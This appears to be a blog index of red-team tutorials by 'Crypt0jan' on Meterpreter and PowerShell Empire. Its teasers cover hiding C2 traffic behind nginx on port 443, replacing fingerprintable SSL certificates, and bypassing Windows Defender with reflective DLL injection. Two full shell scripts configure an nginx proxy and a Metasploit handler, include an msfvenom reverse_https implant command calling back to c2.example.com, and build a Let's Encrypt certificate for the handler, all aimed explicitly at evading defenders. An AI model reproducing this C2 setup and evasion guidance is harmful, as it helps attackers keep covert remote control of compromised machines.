Meterpreter & Nginx Reverse Proxy

Photo by Markus Winkler via Unsplash.com

INTRODUCTION

If you have been using Meterpreter in heavily monitored environments, you probably know that the plug-and-play defaults won’t work for you. You need to hide your C2 (command-and-control) traffic among the regular web traffic on the network, which means listening on well-known ports such as 80 (HTTP) or 443 (HTTPS) and using the advanced handler options like HandlerSSLCert, OverrideRequestHost and EnableStageEncoding.

Binding a listener to a privileged port (0–1023) requires root, but when you start msfconsole with sudo or as the root user, Metasploit warns you that PayloadUUIDTracking will not work (among other things). There are…
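One way to reconcile the two constraints above, as an added example that is not code from the article: let nginx (the only process that needs root) terminate TLS on 443 and proxy plain HTTP to an unprivileged Metasploit handler bound to a loopback port, while the Override* handler options make the stage call back to the public https name instead of the loopback address. The domain c2.example.com, the certbot paths, port 8080 and the output file names are assumptions.

```shell
#!/bin/sh
# Added example, not from the original article: nginx terminates TLS on 443 and proxies
# plain HTTP to an unprivileged Metasploit handler on 127.0.0.1:8080. The Override*
# options make the handler hand the stage a callback of https://<Host header>:443
# rather than http://127.0.0.1:8080.
# Assumed values: domain c2.example.com, certbot paths under /etc/letsencrypt, port 8080.

write_nginx_conf() {
    # Quoted heredoc: nginx variables such as $host must reach the file unexpanded.
    cat <<'EOF'
server {
    listen 443 ssl;
    server_name c2.example.com;

    ssl_certificate     /etc/letsencrypt/live/c2.example.com/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/c2.example.com/privkey.pem;

    location / {
        proxy_pass http://127.0.0.1:8080;
        # OverrideRequestHost reads the Host header, so nginx must forward the
        # original one instead of the upstream address it would send by default.
        proxy_set_header Host $host;
        proxy_set_header X-Forwarded-For $remote_addr;
        proxy_http_version 1.1;
        proxy_buffering off;
    }
}
EOF
}

write_handler_rc() {
    # msfconsole resource script for the unprivileged handler side.
    cat <<'EOF'
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_http
set LHOST 127.0.0.1
set LPORT 8080
set ReverseListenerBindAddress 127.0.0.1
set OverrideRequestHost true
set OverrideLPORT 443
set OverrideScheme https
set EnableStageEncoding true
set ExitOnSession false
run -j
EOF
}

# The implant is built for the public name, not for the loopback listener:
#   msfvenom -p windows/x64/meterpreter/reverse_https LHOST=c2.example.com LPORT=443 -f exe -o agent.exe
# Start with:  nginx -s reload  (as root)  and  msfconsole -q -r c2-handler.rc  (unprivileged)

write_nginx_conf > "${NGINX_OUT:-./c2-proxy.conf}"
write_handler_rc > "${RC_OUT:-./c2-handler.rc}"
```

With this split, the handler never binds a privileged port, so msfconsole can stay unprivileged and keep PayloadUUIDTracking. The `proxy_set_header Host $host;` line is what makes OverrideRequestHost useful; without it nginx sends its upstream address as the Host header and the stage would be told to call back to 127.0.0.1. If you want nginx to serve a decoy site on most paths and only forward the implant's requests, set the same LURI on the payload and the handler and restrict the proxied `location` to that prefix.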


Bypassing Windows Defender — Meterpreter edition


TOPICS

  1. MSFvenom payload creation
  2. Extra XOR layer
  3. Create DLL and Powershell Download Script
  4. Get a shell!

Bypassing Windows Defender

Last month I wrote two articles about the proper use of SSL with PowerShell Empire and with Meterpreter. That alone (plus some other magic) let us bypass most antivirus products. However, over the past few weeks Windows Defender seems to have become a lot smarter and is now able to detect these techniques. This tutorial will guide you through creating a working Meterpreter backdoor using a technique called ‘Reflective DLL Injection’ without being detected by Windows Defender. …


Bypassing Windows Defender — Empire edition


TOPICS

  1. Empire setup
  2. Magic to avoid detection
  3. Go go go!

Bypassing Windows Defender

Last month I wrote two articles about the proper use of SSL with PowerShell Empire and with Meterpreter. That alone (plus some other magic) let us bypass most antivirus products. However, over the past few weeks Windows Defender seems to have become a lot smarter and is now able to detect these techniques. This tutorial will guide you through creating a working Empire backdoor without being detected by Windows Defender. For the same guide written for Meterpreter, check out Red Team Tutorials №4.

1. Empire setup

Below, you’ll see me use SSL…


Encrypting Empire traffic


TOPICS

  1. Register a domain
  2. Letsencrypt
  3. Empire Magic

GO THE EXTRA MILE

Stop being lazy. Stop using the default options that ship with your favourite hacking tools. To avoid detection you need to play smart, because, believe it or not, Hunters (or: Blue Teamers) are getting smarter every day.

In this tutorial I will not only focus on the (proper) use of SSL but also show you some of the options that need changing to avoid detection. The options I set are by no means exhaustive; they merely show that the defaults are easily fingerprintable. So, go the extra mile!

I…


Encrypting Meterpreter traffic


TOPICS

  1. Register a domain
  2. Letsencrypt
  3. Meterpreter Magic

STOP USING DEFAULT SSL CERTIFICATES

By default, when you turn on SSL, Meterpreter generates its own self-signed certificate to encrypt traffic between the target and your C2 server. However, these generated certificates contain fingerprintable data that lets Hunters easily spot your backdoor.

Obviously, with TLS termination (or SSL offloading) on an inspection proxy, Hunters would be able to read and interpret the decrypted stream, but that is computationally intensive and therefore, most of the time, requires a dedicated device. …
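The fix for a fingerprintable default certificate is to hand the handler a real one. As an added example that is not code from the article: the HandlerSSLCert option expects a single PEM file containing both the private key and the certificate chain, and the script below builds that file from a Let's Encrypt live directory and checks it before a handler is pointed at it. The domain, the certbot layout under /etc/letsencrypt and the output path are assumptions.

```shell
#!/bin/sh
# Added example, not from the original article: build the unified PEM that the
# HandlerSSLCert option expects (private key AND certificate chain in ONE file) from a
# Let's Encrypt live directory, and sanity-check it before a handler is pointed at it.
# Assumed: certbot layout under /etc/letsencrypt/live/<domain>/ and the domain name.

build_handler_cert() {
    # $1 = certbot live directory, $2 = output file (key first, then leaf + intermediates)
    cat "$1/privkey.pem" "$1/fullchain.pem" > "$2" && chmod 600 "$2"
}

check_handler_cert() {
    # Succeeds only when the file holds exactly one private key and at least one
    # certificate, which catches a truncated copy or a file that is only the chain.
    # (grep -c prints 0 but exits 1 when nothing matches, hence the || true.)
    keys=$(grep -c 'BEGIN .*PRIVATE KEY' "$1" || true)
    certs=$(grep -c 'BEGIN CERTIFICATE' "$1" || true)
    [ "$keys" -eq 1 ] && [ "$certs" -ge 1 ]
}

LIVE="${LIVE_DIR:-/etc/letsencrypt/live/c2.example.com}"
OUT="${OUT_PEM:-/root/c2-handler.pem}"
if [ -d "$LIVE" ]; then
    build_handler_cert "$LIVE" "$OUT"
    check_handler_cert "$OUT" && echo "handler PEM ok: $OUT"
fi

# Then, in msfconsole:
#   use exploit/multi/handler
#   set PAYLOAD windows/x64/meterpreter/reverse_https
#   set LHOST c2.example.com
#   set LPORT 443
#   set HandlerSSLCert /root/c2-handler.pem
```

Two caveats a practitioner will want: Let's Encrypt certificates expire after 90 days, so every renewal has to rebuild the unified file (and restart the handler), and if you also pin the certificate in the stager with StagerVerifySSLCert, a renewal will break every implant that was built against the old certificate.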

Crypt0jan

Founder // Hacker @ Chapter8.com
